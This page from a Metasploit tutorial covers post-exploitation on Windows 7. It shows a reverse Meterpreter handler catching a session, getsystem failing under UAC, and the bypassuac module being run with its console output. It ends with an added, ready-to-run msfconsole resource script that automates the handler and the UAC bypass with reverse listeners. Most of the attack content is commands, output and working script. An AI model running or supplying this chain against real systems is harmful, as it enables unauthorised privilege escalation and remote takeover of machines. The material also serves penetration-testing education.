
Meterpreter Scripting


In this example, we use the post exploitation modules, which can be used to bypass UAC. We first start the multi/handler module with the -j flag, which runs the handler as a background job so that it can keep accepting Meterpreter shells while we work. Notice in this example that when we try to run the getsystem command, it fails: the session is running in a medium-integrity process, because Windows UAC has filtered the logged-on administrator's token, so the privileges getsystem relies on are not available to us.

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:2310) at Thu June 09 08:02:45 -0500 2011

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS      : Windows 7 (Build 7600).
Arch    : x64 (Current Process is WOW64)
Language: en_US
meterpreter >

Notice that we can't escalate to a system-level account, because UAC is blocking us. We need to get around UAC to obtain an unrestricted administrator token; from there, getsystem can take us to SYSTEM, and we can further compromise the machine. We press CTRL-Z to background the session, keeping it active. Then we use the new format to run post modules and bypass the Windows UAC functionality.

msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options (post/windows/escalate/bypassuac):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     no        Listener IP address for the new session
   LPORT    4444             no        Listener port for the new session
   SESSION                   yes       The session to run this module on.

msf post(bypassuac) > set LHOST 172.16.32.128
LHOST => 172.16.32.128
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
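The whole procedure above (background handler, then the UAC bypass against the session that arrives) can be driven from a single msfconsole resource script. The script below is an added example, not the book's meta_config file or Metasploit's own code. It assumes the same payload, addresses and ports as the listing above, the module name post/windows/escalate/bypassuac exactly as the page shows it, and relies on the framework object and run_single helper that msfconsole exposes to the <ruby> blocks of a resource script. One detail it makes explicit: exploit -j only puts the handler in the background, and it is ExitOnSession false that keeps the handler alive for more than one session.

```text
# bypassuac_demo.rc  (added example; run with: msfconsole -r bypassuac_demo.rc)
# Assumed values: LHOST 172.16.32.128, LPORT 443 for the first session and
# 4444 for the session the bypass module spawns, as on the page.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.32.128
set LPORT 443
# -j alone backgrounds the job; without this the handler exits after its first session.
set ExitOnSession false
exploit -j

<ruby>
# Wait for the first Meterpreter session, then run the UAC bypass against it.
# 'framework' and 'run_single' are provided to resource scripts by msfconsole.
print_status("Waiting for a Meterpreter session...")
sleep(2) while framework.sessions.empty?
sid = framework.sessions.keys.sort.first
print_status("Session #{sid} arrived; getsystem fails from a UAC-filtered token, so running the bypass")
run_single("use post/windows/escalate/bypassuac")
run_single("set SESSION #{sid}")
run_single("set LHOST 172.16.32.128")
run_single("set LPORT 4444")
run_single("exploit")
</ruby>
```

When the bypass module's new session connects back on port 4444, interact with it (sessions -i <id>) and retry getsystem there; the new process carries the unfiltered administrator token that the original session lacked.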